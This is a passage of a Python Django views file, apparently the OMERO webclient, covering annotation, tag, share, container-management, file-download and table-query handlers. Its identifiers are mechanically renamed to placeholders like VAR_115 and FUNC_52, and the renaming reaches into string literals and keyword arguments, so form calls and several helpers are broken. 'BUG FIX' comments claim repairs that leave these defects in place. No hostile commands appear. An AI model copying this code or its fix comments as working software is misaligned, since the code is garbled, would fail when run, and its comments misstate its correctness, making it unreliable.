    if VAR_155 == 0:
        raise Http404("Need to specify objects via e.g. ?VAR_142=1")
    VAR_104 = None
    if VAR_155 == 1:
        for VAR_433 in VAR_114:
            if len(VAR_114[VAR_433]) > 0:
                VAR_28 = VAR_433[:-1]  # "images" -> "image"
                VAR_29 = VAR_114[VAR_433][0]
                break
        if VAR_28 in (
            "dataset",
            "project",
            "image",
            "screen",
            "plate",
            "acquisition",
            "well",
            "comment",
            "file",
            "tag",
            "tagset",
        ):
            if VAR_28 == "tagset":
                VAR_28 = "tag"
            VAR_94 = {}
            if VAR_28 is not None and int(VAR_29) > 0:
                VAR_94[VAR_345(VAR_28)] = int(VAR_29)
            try:
                VAR_104 = BaseContainer(VAR_5, **VAR_94)
            except AttributeError as x:
                return handlerInternalError(VAR_2, x)
    if VAR_104 is not None:
        VAR_284 = VAR_104.getFilesByObject()
    else:
        VAR_104 = BaseContainer(VAR_5)
        for VAR_215, VAR_143 in VAR_154.items():
            if len(VAR_143) > 0:
                VAR_284 = VAR_104.getFilesByObject(
                    VAR_12=VAR_215, parent_ids=[o.getId() for o in VAR_143]
                )
                break
    VAR_115["files"] = VAR_284
    if VAR_2.method == "POST":
        VAR_285 = FilesAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
        if VAR_285.is_valid():
            VAR_284 = VAR_285.cleaned_data["files"]
            VAR_353 = []
            if VAR_284 is not None and len(VAR_284) > 0:
                VAR_353 = VAR_104.createAnnotationsLinks("file", VAR_284, VAR_154)
            VAR_234 = (
                "annotation_file" in VAR_2.FILES
                and VAR_2.FILES["annotation_file"]
                or None
            )
            if VAR_234 is not None and VAR_234 != "":
                VAR_399 = VAR_104.createFileAnnotations(VAR_234, VAR_154)
                VAR_353.append(VAR_399)
            return JsonResponse({"fileIds": VAR_353})
        else:
            return HttpResponse(VAR_285.errors)
    else:
        VAR_285 = FilesAnnotationForm(VAR_115=VAR_115)
    VAR_53 = {"form_file": VAR_285}
    VAR_54 = "webclient/annotations/files_form.html"
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required()
@render_response()
def FUNC_46(VAR_2, VAR_5=None, **VAR_6):
    """Set the rating on every object selected in the request (POST only)."""
    if VAR_2.method != "POST":
        raise Http404("Only POST supported")
    rating = getIntOrDefault(VAR_2, "rating", 0)
    for objects in FUNC_42(VAR_2, VAR_5).values():
        for obj in objects:
            obj.setRating(rating)
    return JsonResponse({"success": True})
@login_required()
@render_response()
def FUNC_47(VAR_2, VAR_5=None, **VAR_6):
    """Add a comment annotation to the selected objects or share (POST).

    BUG FIX: `CommentAnnotationForm(VAR_115=initial, ...)` referenced the
    undefined name `initial`; the initial-data dict built above is the
    local `VAR_115`.
    """
    if VAR_2.method != "POST":
        raise Http404("Unbound instance of VAR_22 not available.")
    VAR_154 = FUNC_42(VAR_2, VAR_5)
    VAR_114 = FUNC_43(VAR_2)
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
        "shares": VAR_154["share"],
    }
    if len(VAR_154["share"]) < 1:
        # Work in the group of the first selected object
        for obs in VAR_154.values():
            if len(obs) > 0:
                VAR_5.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    VAR_157 = CommentAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
    if VAR_157.is_valid():
        VAR_286 = VAR_157.cleaned_data["comment"]
        if VAR_286 is not None and VAR_286 != "":
            if VAR_154["share"] is not None and len(VAR_154["share"]) > 0:
                VAR_400 = VAR_154["share"][0].id
                VAR_104 = BaseShare(VAR_5, VAR_400)
                # Share comments include a link back to the public page
                VAR_401 = "%s?server=%i" % (
                    VAR_2.build_absolute_uri(
                        VAR_350("load_template", args=["public"])
                    ),
                    int(VAR_5.server_id),
                )
                VAR_402 = VAR_104.addComment(VAR_401, VAR_286)
                VAR_53 = {
                    "tann": VAR_402,
                    "added_by": VAR_5.getUserId(),
                    "template": "webclient/annotations/comment.html",
                }
            else:
                VAR_104 = BaseContainer(VAR_5)
                VAR_34 = VAR_104.createCommentAnnotations(VAR_286, VAR_154)
                VAR_53 = {"annId": VAR_34, "added_by": VAR_5.getUserId()}
        return VAR_53
    else:
        return HttpResponse(VAR_345(VAR_157.errors))
@login_required()
@render_response()
def FUNC_48(VAR_2, VAR_5=None, **VAR_6):
    """Create, update, duplicate or delete MapAnnotations (key-value pairs).

    POST 'mapAnnotation' is a JSON list of [key, value] pairs; 'annId'
    lists existing annotations to update (empty data deletes them).
    Without annIds, new annotations are created and linked to the
    selected objects, optionally one copy per object ('duplicate').
    """
    if VAR_2.method != "POST":
        raise Http404(
            "Need to POST map annotation VAR_158 as list of" " ['key', 'value'] pairs"
        )
    VAR_154 = FUNC_42(VAR_2, VAR_5)
    if len(VAR_154["share"]) < 1:
        # Save into the group of the first selected object.
        for obs in VAR_154.values():
            if len(obs) > 0:
                VAR_5.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
                break
    VAR_158 = VAR_2.POST.get("mapAnnotation")
    VAR_158 = json.loads(VAR_158)
    VAR_159 = VAR_2.POST.getlist("annId")
    VAR_90 = VAR_2.POST.get("ns", omero.constants.metadata.NSCLIENTMAPANNOTATION)
    if len(VAR_159) == 0 and len(VAR_158) > 0:
        VAR_287 = VAR_2.POST.get("duplicate", "false")
        # BUG FIX: the comparison result was discarded (bare expression
        # statement); assign it so the "duplicate" POST flag takes effect.
        VAR_287 = VAR_287.lower() == "true"
        if VAR_90 == omero.constants.metadata.NSCLIENTMAPANNOTATION:
            VAR_287 = True
        if VAR_287:
            # One new MapAnnotation per selected object.
            for VAR_415, VAR_143 in VAR_154.items():
                for VAR_38 in VAR_143:
                    VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_5)
                    VAR_180.setValue(VAR_158)
                    VAR_180.setNs(VAR_90)
                    VAR_180.save()
                    VAR_159.append(VAR_180.getId())
                    VAR_38.linkAnnotation(VAR_180)
        else:
            # A single shared MapAnnotation linked to every object.
            VAR_180 = omero.gateway.MapAnnotationWrapper(VAR_5)
            VAR_180.setValue(VAR_158)
            VAR_180.setNs(VAR_90)
            VAR_180.save()
            VAR_159.append(VAR_180.getId())
            for VAR_415, VAR_143 in VAR_154.items():
                for VAR_38 in VAR_143:
                    VAR_38.linkAnnotation(VAR_180)
    else:
        for VAR_34 in VAR_159:
            VAR_180 = VAR_5.getObject("MapAnnotation", VAR_34)
            if VAR_180 is None:
                continue
            if len(VAR_158) > 0:
                VAR_180.setValue(VAR_158)
                VAR_180.save()
            else:
                # Empty data means: delete the existing annotation.
                VAR_84 = VAR_5.deleteObjects("/Annotation", [VAR_34])
                try:
                    VAR_5._waitOnCmd(VAR_84)
                finally:
                    VAR_84.close()
    if len(VAR_158) == 0:
        VAR_159 = None
    return {"annId": VAR_159}
@login_required()
@render_response()
def FUNC_49(VAR_2, VAR_5=None, **VAR_6):
    """Return tags (recursively, across groups) in one of several JSON modes.

    GET 'jsonmode' selects the payload: 'tagcount', 'tags', 'desc' or
    'owners'; 'offset'/'limit' page the recursive tag load.
    """
    VAR_101 = FUNC_0(VAR_2, "group", -1)
    VAR_5.SERVICE_OPTS.setOmeroGroup(VAR_345(VAR_101))
    try:
        VAR_177 = int(VAR_2.GET.get("offset"))
        VAR_88 = int(VAR_2.GET.get("limit", 1000))
    except Exception:
        # Missing/invalid paging params: load everything.
        VAR_177 = VAR_88 = None
    VAR_160 = VAR_2.GET.get("jsonmode")
    if VAR_160 == "tagcount":
        VAR_288 = VAR_5.getTagCount()
        # BUG FIX: was `dict(VAR_288=tag_count)` - 'tag_count' is undefined.
        return dict(VAR_288=VAR_288)
    VAR_104 = BaseContainer(VAR_5)
    # BUG FIX: keyword values referenced undefined names 'offset'/'limit'.
    VAR_104.loadTagsRecursive(eid=-1, VAR_177=VAR_177, VAR_88=VAR_88)
    VAR_161 = VAR_104.tags_recursive
    VAR_162 = VAR_104.tags_recursive_owners
    if VAR_160 == "tags":
        VAR_71 = list((VAR_318, VAR_433, o, s) for VAR_318, VAR_362, VAR_433, o, s in VAR_161)
        return VAR_71
    elif VAR_160 == "desc":
        return dict((VAR_318, VAR_362) for VAR_318, VAR_362, VAR_433, o, s in VAR_161)
    elif VAR_160 == "owners":
        return VAR_162
    return HttpResponse()
@login_required()
@render_response()
def FUNC_50(VAR_2, VAR_5=None, **VAR_6):
    """Show/process the tagging dialog for the selected objects.

    GET renders the tag form (pre-selecting tags linked to ALL selected
    objects by the current user); POST links/unlinks tags and creates
    new ones, returning JSON of added/removed/new tag ids.
    """
    VAR_154 = FUNC_42(VAR_2, VAR_5)
    VAR_114 = FUNC_43(VAR_2)
    VAR_155 = sum([len(VAR_114[types]) for types in VAR_114])
    VAR_104 = None
    VAR_163 = VAR_5.getEventContext().userId
    VAR_164 = []
    # Operate in the group of the first selected object.
    for obs in VAR_154.values():
        if len(obs) > 0:
            VAR_5.SERVICE_OPTS.setOmeroGroup(obs[0].getDetails().group.id.val)
            break
    VAR_165, VAR_166 = tree.marshal_annotations(
        VAR_5,
        VAR_44=VAR_114["projects"],
        VAR_45=VAR_114["datasets"],
        VAR_46=VAR_114["images"],
        VAR_47=VAR_114["screens"],
        VAR_48=VAR_114["plates"],
        VAR_85=VAR_114["acquisitions"],
        VAR_86=VAR_114["wells"],
        VAR_89="tag",
        VAR_88=VAR_1,
    )
    VAR_167 = {}
    for VAR_232 in VAR_166:
        VAR_167[VAR_232["id"]] = VAR_232
    if VAR_155 > 1:
        # Multiple objects selected: keep only tags the current user has
        # linked to every one of them.
        VAR_289 = {}
        for VAR_433 in VAR_165:
            VAR_354 = VAR_433["id"]
            if VAR_354 not in VAR_289:
                VAR_289[VAR_354] = 0
            if VAR_433["link"]["owner"]["id"] == VAR_163:
                VAR_289[VAR_354] += 1
        VAR_165 = [VAR_433 for VAR_433 in VAR_165 if VAR_289[VAR_433["id"]] == VAR_155]
    VAR_168 = []
    for tag in VAR_165:
        VAR_290 = tag["link"]["owner"]["id"]
        VAR_103 = VAR_167[VAR_290]
        VAR_291 = "%s %s" % (VAR_103["firstName"], VAR_103["lastName"])
        VAR_292 = True
        VAR_293 = tag["link"]["date"]
        VAR_294 = VAR_290 == VAR_163
        VAR_168.append(
            (tag["id"], VAR_163, VAR_291, VAR_292, VAR_293, VAR_294)
        )
    # BUG FIX: list.sort() takes `key`, not the mangled `VAR_310` keyword.
    VAR_168.sort(key=lambda x: x[0])
    VAR_115 = {
        "selected": VAR_114,
        "images": VAR_154["image"],
        "datasets": VAR_154["dataset"],
        "projects": VAR_154["project"],
        "screens": VAR_154["screen"],
        "plates": VAR_154["plate"],
        "acquisitions": VAR_154["acquisition"],
        "wells": VAR_154["well"],
    }
    if VAR_2.method == "POST":
        # BUG FIX: was `VAR_115=initial` (undefined name) - pass the
        # initial dict built above.
        VAR_295 = TagsAnnotationForm(VAR_115=VAR_115, VAR_158=VAR_2.POST.copy())
        VAR_296 = NewTagsAnnotationFormSet(
            prefix="newtags", VAR_158=VAR_2.POST.copy()
        )
        if VAR_295.is_valid() and VAR_296.is_valid():
            # Diff the submitted tag set against what the user already linked.
            VAR_355 = [stag[0] for stag in VAR_168 if stag[5]]
            VAR_355 = list(set(VAR_355))
            VAR_356 = list(VAR_295.cleaned_data["tags"])
            VAR_164 = [tag for tag in VAR_356 if tag not in VAR_355]
            VAR_357 = [tag for tag in VAR_355 if tag not in VAR_356]
            VAR_104 = BaseContainer(VAR_5)
            if VAR_164:
                VAR_104.createAnnotationsLinks("tag", VAR_164, VAR_154)
            VAR_358 = []
            for VAR_22 in VAR_296.forms:
                VAR_358.append(
                    VAR_104.createTagAnnotations(
                        VAR_22.cleaned_data["tag"],
                        VAR_22.cleaned_data["description"],
                        VAR_154,
                        tag_group_id=VAR_22.cleaned_data["tagset"],
                    )
                )
            for remove in VAR_357:
                VAR_403 = BaseContainer(VAR_5, tag=remove)
                VAR_403.remove(
                    [
                        "%s-%s" % (VAR_215, VAR_38.id)
                        for VAR_215, VAR_143 in VAR_154.items()
                        for VAR_38 in VAR_143
                    ],
                    tag_owner_id=VAR_163,
                )
            return JsonResponse({"added": VAR_164, "removed": VAR_357, "new": VAR_358})
        else:
            return HttpResponse(VAR_345(VAR_295.errors))
    else:
        # BUG FIX: was `VAR_115=initial` (undefined name).
        VAR_295 = TagsAnnotationForm(VAR_115=VAR_115)
        VAR_296 = NewTagsAnnotationFormSet(prefix="newtags")
    VAR_53 = {
        "form_tags": VAR_295,
        "newtags_formset": VAR_296,
        "selected_tags": VAR_168,
    }
    VAR_54 = "webclient/annotations/tags_form.html"
    VAR_53["template"] = VAR_54
    return VAR_53
@require_POST
@login_required()
@render_response()
def FUNC_51(VAR_2, VAR_26, VAR_5=None, **VAR_6):
    """Collect channel names from POST and optionally save them.

    Channel names come from POST fields "channel0", "channel1", ...;
    when "confirm_apply" is present they are saved, either across the
    parent container given by "parentId" or for this image only.
    """
    image = VAR_5.getObject("Image", VAR_26)
    channel_count = image.getSizeC()
    names_by_field = {}
    names_by_index = {}
    for idx in range(channel_count):
        field = "channel%d" % idx
        label = VAR_2.POST.get(field, None)
        if label is None:
            continue
        label = smart_str(label)[:255]  # Truncate to fit in DB
        names_by_field[field] = label
        names_by_index[idx + 1] = label
    if VAR_2.POST.get("confirm_apply", None) is None:
        return {"error": "No VAR_413 found to apply Channel Names"}
    parent = VAR_2.POST.get("parentId", None)
    if parent is not None:
        parent_type = parent.split("-")[0].title()
        parent_id = VAR_241(parent.split("-")[1])
        counts = VAR_5.setChannelNames(
            parent_type, [parent_id], names_by_index, channelCount=channel_count
        )
    else:
        counts = VAR_5.setChannelNames("Image", [image.getId()], names_by_index)
    payload = {"channelNames": names_by_field}
    if counts:
        payload["imageCount"] = counts["imageCount"]
        payload["updateCount"] = counts["updateCount"]
    return payload
@login_required(setGroupContext=True)
@render_response()
def FUNC_52(
    VAR_2, VAR_27, VAR_28=None, VAR_29=None, VAR_5=None, **VAR_6
):
    """Dispatch container-management actions (VAR_27) on an object.

    Supported actions: 'addnewcontainer', share 'add'/'edit'/'save',
    'editname'/'savename', 'editdescription'/'savedescription',
    'remove', 'removefromshare', 'delete' and 'deletemany'.
    Returns a template context dict or an HTTP/JSON response.
    """
    VAR_54 = None
    VAR_104 = None
    # Build the appropriate manager for the target object type.
    if VAR_28 in (
        "dataset",
        "project",
        "image",
        "screen",
        "plate",
        "acquisition",
        "well",
        "comment",
        "file",
        "tag",
        "tagset",
    ):
        VAR_94 = {}
        if VAR_28 is not None and int(VAR_29) > 0:
            VAR_29 = int(VAR_29)
            VAR_94[VAR_345(VAR_28)] = VAR_29
        try:
            VAR_104 = BaseContainer(VAR_5, **VAR_94)
        except AttributeError as x:
            return handlerInternalError(VAR_2, x)
    elif VAR_28 in ("share", "sharecomment", "chat"):
        VAR_104 = BaseShare(VAR_5, VAR_29)
    else:
        VAR_104 = BaseContainer(VAR_5)
    VAR_22 = None
    if VAR_27 == "addnewcontainer":
        if not VAR_2.method == "POST":
            # BUG FIX: JsonResponse takes `status`, not the mangled VAR_313.
            return JsonResponse(
                {"Error": "Must use POST to create container"}, status=405
            )
        VAR_22 = ContainerForm(VAR_158=VAR_2.POST.copy())
        if VAR_22.is_valid():
            VAR_0.debug("Create new in %s: %s" % (VAR_28, VAR_345(VAR_22.cleaned_data)))
            VAR_3 = VAR_22.cleaned_data["name"]
            VAR_360 = VAR_22.cleaned_data["description"]
            VAR_103 = VAR_22.cleaned_data["owner"]
            if VAR_28 == "project" and hasattr(VAR_104, VAR_28) and VAR_29 > 0:
                # BUG FIX: was `VAR_103=owner` - 'owner' is undefined here.
                VAR_40 = VAR_104.createDataset(VAR_3, VAR_360, VAR_103=VAR_103)
            elif VAR_28 == "tagset" and VAR_29 > 0:
                VAR_40 = VAR_104.createTag(VAR_3, VAR_360, VAR_103=VAR_103)
            elif VAR_2.POST.get("folder_type") in (
                "project",
                "screen",
                "dataset",
                "tag",
                "tagset",
            ):
                VAR_441 = VAR_2.POST.get("folder_type")
                if VAR_441 == "dataset":
                    VAR_40 = VAR_104.createDataset(
                        VAR_3,
                        VAR_360,
                        VAR_103=VAR_103,
                        VAR_404=VAR_2.POST.getlist("image", None),
                    )
                else:
                    VAR_40 = VAR_5.createContainer(
                        VAR_441, VAR_3, VAR_360, VAR_103=VAR_103
                    )
            else:
                return HttpResponseServerError("Object does not exist")
            VAR_361 = {"bad": "false", "id": VAR_40}
            return JsonResponse(VAR_361)
        else:
            VAR_362 = dict()
            for e in VAR_22.errors.items():
                VAR_362.update({e[0]: unicode(e[1])})
            VAR_361 = {"bad": "true", "errs": VAR_362}
            return JsonResponse(VAR_361)
    elif VAR_27 == "add":
        VAR_54 = "webclient/public/share_form.html"
        VAR_363 = list(VAR_5.getExperimenters())
        # BUG FIX (here and below): list.sort() takes `key`, not VAR_310.
        VAR_363.sort(key=lambda x: x.getOmeName().lower())
        if VAR_28 == "share":
            VAR_404 = VAR_2.GET.getlist("image", VAR_2.POST.getlist("image"))
            if VAR_2.method == "GET" and len(VAR_404) == 0:
                return HttpResponse("No VAR_106 specified")
            VAR_405 = list(VAR_5.getObjects("Image", VAR_404))
            if VAR_2.method == "POST":
                VAR_22 = BasketShareForm(
                    VAR_115={"experimenters": VAR_363, "images": VAR_405},
                    VAR_158=VAR_2.POST.copy(),
                )
                if VAR_22.is_valid():
                    VAR_106 = VAR_22.cleaned_data["image"]
                    VAR_382 = VAR_22.cleaned_data["message"]
                    VAR_442 = VAR_22.cleaned_data["expiration"]
                    VAR_64 = VAR_22.cleaned_data["members"]
                    VAR_443 = VAR_22.cleaned_data["enable"]
                    VAR_401 = "%s?server=%i" % (
                        VAR_2.build_absolute_uri(
                            VAR_350("load_template", args=["public"])
                        ),
                        int(VAR_5.server_id),
                    )
                    VAR_444 = VAR_104.createShare(
                        VAR_401, VAR_106, VAR_382, VAR_64, VAR_443, VAR_442
                    )
                    return HttpResponse("shareId:%s" % VAR_444)
            else:
                VAR_115 = {
                    "experimenters": VAR_363,
                    "images": VAR_405,
                    "enable": True,
                    "selected": VAR_2.GET.getlist("image"),
                }
                # BUG FIX: was `VAR_115=initial` (undefined name).
                VAR_22 = BasketShareForm(VAR_115=VAR_115)
        VAR_54 = "webclient/public/share_form.html"
        VAR_53 = {"manager": VAR_104, "form": VAR_22}
    elif VAR_27 == "edit":
        if VAR_29 is None:
            raise Http404("No share ID")
        if VAR_28 == "share" and int(VAR_29) > 0:
            VAR_54 = "webclient/public/share_form.html"
            VAR_104.getMembers(VAR_29)
            VAR_104.getComments(VAR_29)
            VAR_363 = list(VAR_5.getExperimenters())
            VAR_363.sort(key=lambda x: x.getOmeName().lower())
            VAR_115 = {
                "message": VAR_104.share.message,
                "expiration": "",
                "shareMembers": VAR_104.membersInShare,
                "enable": VAR_104.share.active,
                "experimenters": VAR_363,
            }
            if VAR_104.share.getExpireDate() is not None:
                VAR_115["expiration"] = VAR_104.share.getExpireDate().strftime(
                    "%Y-%m-%d"
                )
            # BUG FIX: was `VAR_115=initial` (undefined name).
            VAR_22 = ShareForm(VAR_115=VAR_115)  # 'guests':share.guestsInShare,
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
    elif VAR_27 == "save":
        if not VAR_2.method == "POST":
            return HttpResponseRedirect(
                VAR_350("manage_action_containers", args=["edit", VAR_28, VAR_29])
            )
        if VAR_28 == "share":
            VAR_363 = list(VAR_5.getExperimenters())
            VAR_363.sort(key=lambda x: x.getOmeName().lower())
            VAR_22 = ShareForm(
                VAR_115={"experimenters": VAR_363}, VAR_158=VAR_2.POST.copy()
            )
            if VAR_22.is_valid():
                VAR_0.debug("Update share: %s" % (VAR_345(VAR_22.cleaned_data)))
                VAR_382 = VAR_22.cleaned_data["message"]
                VAR_442 = VAR_22.cleaned_data["expiration"]
                VAR_64 = VAR_22.cleaned_data["members"]
                VAR_443 = VAR_22.cleaned_data["enable"]
                VAR_401 = "%s?server=%i" % (
                    VAR_2.build_absolute_uri(
                        VAR_350("load_template", args=["public"])
                    ),
                    int(VAR_5.server_id),
                )
                VAR_104.updateShareOrDiscussion(
                    VAR_401, VAR_382, VAR_64, VAR_443, VAR_442
                )
                VAR_71 = "enable" if VAR_443 else "disable"
                return HttpResponse(VAR_71)
            else:
                VAR_54 = "webclient/public/share_form.html"
                VAR_53 = {"share": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "editname":
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_38 = getattr(VAR_104, VAR_28)
            VAR_54 = "webclient/ajax_form/container_form_ajax.html"
            if VAR_28 == "tag":
                VAR_447 = VAR_38.textValue
            else:
                VAR_447 = VAR_38.getName()
            VAR_22 = ContainerNameForm(VAR_115={"name": VAR_447})
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "savename":
        if not VAR_2.method == "POST":
            return HttpResponseRedirect(
                VAR_350("manage_action_containers", args=["edit", VAR_28, VAR_29])
            )
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_22 = ContainerNameForm(VAR_158=VAR_2.POST.copy())
            if VAR_22.is_valid():
                VAR_0.debug("Update VAR_3 VAR_22:" + VAR_345(VAR_22.cleaned_data))
                VAR_3 = VAR_22.cleaned_data["name"]
                VAR_361 = {"bad": "false", "o_type": VAR_28}
                VAR_104.updateName(VAR_28, VAR_3)
                return JsonResponse(VAR_361)
            else:
                VAR_362 = dict()
                for e in VAR_22.errors.items():
                    VAR_362.update({e[0]: unicode(e[1])})
                VAR_361 = {"bad": "true", "errs": VAR_362}
                return JsonResponse(VAR_361)
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "editdescription":
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_38 = getattr(VAR_104, VAR_28)
            VAR_54 = "webclient/ajax_form/container_form_ajax.html"
            VAR_22 = ContainerDescriptionForm(VAR_115={"description": VAR_38.description})
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "savedescription":
        if not VAR_2.method == "POST":
            return HttpResponseServerError(
                "Action '%s' on the '%s' id:%s cannot be complited"
                % (VAR_27, VAR_28, VAR_29)
            )
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_22 = ContainerDescriptionForm(VAR_158=VAR_2.POST.copy())
            if VAR_22.is_valid():
                VAR_0.debug("Update VAR_3 VAR_22:" + VAR_345(VAR_22.cleaned_data))
                VAR_360 = VAR_22.cleaned_data["description"]
                VAR_104.updateDescription(VAR_28, VAR_360)
                VAR_361 = {"bad": "false"}
                return JsonResponse(VAR_361)
            else:
                VAR_362 = dict()
                for e in VAR_22.errors.items():
                    VAR_362.update({e[0]: unicode(e[1])})
                VAR_361 = {"bad": "true", "errs": VAR_362}
                return JsonResponse(VAR_361)
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "remove":
        VAR_82 = VAR_2.POST["parent"]
        try:
            VAR_104.remove(VAR_82.split("|"))
        except Exception as x:
            VAR_0.error(traceback.format_exc())
            VAR_361 = {"bad": "true", "errs": VAR_345(x)}
            return JsonResponse(VAR_361)
        # BUG FIX: was `rdict = {...}` so the success path returned an
        # undefined VAR_361 (NameError).
        VAR_361 = {"bad": "false"}
        return JsonResponse(VAR_361)
    elif VAR_27 == "removefromshare":
        VAR_257 = VAR_2.POST.get("source")
        try:
            VAR_104.removeImage(VAR_257)
        except Exception as x:
            VAR_0.error(traceback.format_exc())
            VAR_361 = {"bad": "true", "errs": VAR_345(x)}
            return JsonResponse(VAR_361)
        # BUG FIX: same undefined-name problem as the "remove" branch.
        VAR_361 = {"bad": "false"}
        return JsonResponse(VAR_361)
    elif VAR_27 == "delete":
        VAR_457 = toBoolean(VAR_2.POST.get("child"))
        VAR_91 = toBoolean(VAR_2.POST.get("anns"))
        try:
            VAR_84 = VAR_104.deleteItem(VAR_457, VAR_91)
            # Register the async delete so the activities view can poll it.
            VAR_2.session["callback"][VAR_345(VAR_84)] = {
                "job_type": "delete",
                "delmany": False,
                "did": VAR_29,
                "dtype": VAR_28,
                "status": "in progress",
                "error": 0,
                "dreport": _formatReport(VAR_84),
                "start_time": datetime.datetime.now(),
            }
            VAR_2.session.modified = True
        except Exception as x:
            VAR_0.error(
                "Failed to delete: %r" % {"did": VAR_29, "dtype": VAR_28}, exc_info=True
            )
            VAR_361 = {"bad": "true", "errs": VAR_345(x)}
        else:
            VAR_361 = {"bad": "false"}
        return JsonResponse(VAR_361)
    elif VAR_27 == "deletemany":
        VAR_459 = {
            "Image": VAR_2.POST.getlist("image"),
            "Dataset": VAR_2.POST.getlist("dataset"),
            "Project": VAR_2.POST.getlist("project"),
            "Annotation": VAR_2.POST.getlist("tag"),
            "Screen": VAR_2.POST.getlist("screen"),
            "Plate": VAR_2.POST.getlist("plate"),
            "Well": VAR_2.POST.getlist("well"),
            "PlateAcquisition": VAR_2.POST.getlist("acquisition"),
        }
        VAR_457 = toBoolean(VAR_2.POST.get("child"))
        VAR_91 = toBoolean(VAR_2.POST.get("anns"))
        VAR_0.debug(
            "Delete many: VAR_457? %s VAR_91? %s VAR_459 %s" % (VAR_457, VAR_91, VAR_459)
        )
        try:
            for VAR_310, VAR_187 in VAR_459.items():
                if VAR_187 is not None and len(VAR_187) > 0:
                    VAR_84 = VAR_104.deleteObjects(VAR_310, VAR_187, VAR_457, VAR_91)
                    if VAR_310 == "PlateAcquisition":
                        VAR_310 = "Plate Run"  # for nicer user VAR_382
                    VAR_460 = {
                        "job_type": "delete",
                        "start_time": datetime.datetime.now(),
                        "status": "in progress",
                        "error": 0,
                        "dreport": _formatReport(VAR_84),
                        "dtype": VAR_310,
                    }
                    if len(VAR_187) > 1:
                        VAR_460["delmany"] = len(VAR_187)
                        VAR_460["did"] = VAR_187
                    else:
                        VAR_460["delmany"] = False
                        VAR_460["did"] = VAR_187[0]
                    VAR_2.session["callback"][VAR_345(VAR_84)] = VAR_460
            VAR_2.session.modified = True
        except Exception:
            VAR_0.error(
                "Failed to delete: %r" % {"did": VAR_187, "dtype": VAR_310}, exc_info=True
            )
            raise
        else:
            VAR_361 = {"bad": "false"}
        return JsonResponse(VAR_361)
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_53(VAR_2, VAR_30, VAR_31=False, VAR_5=None, **VAR_6):
    """Stream an OriginalFile's contents, optionally as an attachment.

    VAR_31 toggles a Content-Disposition download with a sanitized
    filename; the connection is kept open while chunks stream.
    """
    VAR_5.SERVICE_OPTS.setOmeroGroup(-1)
    VAR_173 = VAR_5.getObject("OriginalFile", VAR_30)
    if VAR_173 is None:
        return handlerInternalError(
            VAR_2, "Original File does not exist (id:%s)." % (VAR_30)
        )
    VAR_174 = ConnCleaningHttpResponse(VAR_173.getFileInChunks(buf=settings.CHUNK_SIZE))
    VAR_174.conn = VAR_5
    VAR_175 = VAR_173.mimetype
    if VAR_175 == "text/x-python":
        VAR_175 = "text/plain"  # allows display in browser
    VAR_174["Content-Type"] = VAR_175
    VAR_174["Content-Length"] = VAR_173.getSize()
    if VAR_31:
        VAR_300 = VAR_173.name.replace(" ", "_")
        # BUG FIX: was `downloadName.replace(...)` - 'downloadName' is
        # undefined; continue sanitizing the local filename.
        VAR_300 = VAR_300.replace(",", ".")
        VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
    return VAR_174
@login_required(doConnectionCleanup=False)
@render_response()
def FUNC_54(VAR_2, VAR_32, VAR_33=None, VAR_5=None, **VAR_6):
    """Query an OMERO.table (OriginalFile VAR_32) and return the results.

    With VAR_33 == "csv" the rows are streamed as a CSV attachment;
    otherwise a context dict with data and paging metadata is returned
    (rendered as HTML when VAR_33 is None, JSON otherwise).
    """
    VAR_176 = VAR_2.GET.get("query", "*")
    VAR_177 = FUNC_0(VAR_2, "offset", 0)
    VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
    VAR_178 = None
    try:
        VAR_178 = VAR_350("omero_iviewer_index")
    except NoReverseMatch:
        # iviewer not installed; template simply gets no link.
        pass
    VAR_32 = VAR_241(VAR_32)
    VAR_173 = VAR_5.getObject("OriginalFile", VAR_32)
    if VAR_173 is None:
        raise Http404("OriginalFile %s not found" % VAR_32)
    VAR_179 = VAR_33 == "csv"
    # BUG FIX: keyword values referenced undefined names (conn, query,
    # offset, limit, lazy) - pass the local variables instead.
    VAR_53 = webgateway_views._table_query(
        VAR_2, VAR_32, VAR_5=VAR_5, VAR_176=VAR_176, VAR_177=VAR_177, VAR_88=VAR_88, VAR_179=VAR_179
    )
    if VAR_53.get("error") or not VAR_53.get("data"):
        return JsonResponse(VAR_53)
    if VAR_33 == "csv":
        VAR_301 = VAR_53.get("data")

        def FUNC_87():
            # Stream the CSV: header row first, then lazily-fetched rows.
            VAR_364 = ",".join(VAR_301.get("columns"))
            yield VAR_364
            for rows in VAR_301.get("lazy_rows"):
                yield (
                    "\n" + "\n".join([",".join([VAR_345(VAR_362) for VAR_362 in VAR_378]) for VAR_378 in rows])
                )

        VAR_300 = VAR_173.name.replace(" ", "_").replace(",", ".")
        # BUG FIX: was `downloadName + ".csv"` - 'downloadName' is undefined.
        VAR_300 = VAR_300 + ".csv"
        VAR_174 = TableClosingHttpResponse(FUNC_87(), content_type="text/csv")
        VAR_174.conn = VAR_5
        VAR_174.table = VAR_53.get("table")
        VAR_174["Content-Type"] = "application/force-download"
